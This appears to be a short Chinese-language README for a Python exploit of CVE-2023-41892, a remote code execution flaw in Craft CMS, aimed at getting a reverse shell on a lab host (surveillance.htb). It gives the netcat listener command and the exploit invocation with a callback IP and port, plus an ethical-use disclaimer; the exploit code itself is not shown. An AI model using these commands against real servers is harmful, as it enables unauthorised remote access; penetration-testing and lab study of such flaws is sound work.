
CVE-2023-41892 Reverse Shell
此 Python 脚本利用了 Craft CMS(一款流行的内容管理系统)的远程代码执行漏洞(CVE-2023-41892)。受影响版本为 4.0.0-RC1 至 4.4.14,允许攻击者远程执行任意代码,例如 PHP 反向 Shell。
首先在另一个 shell 中启动 netcat 监听器:
nc -nlvp 1234
然后检查您的 IP 地址并运行漏洞利用程序:
python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb
祝您使用全新的反向 Shell 愉快地进行渗透!
此代码仅用于道德黑客目的,切勿用于任何恶意活动!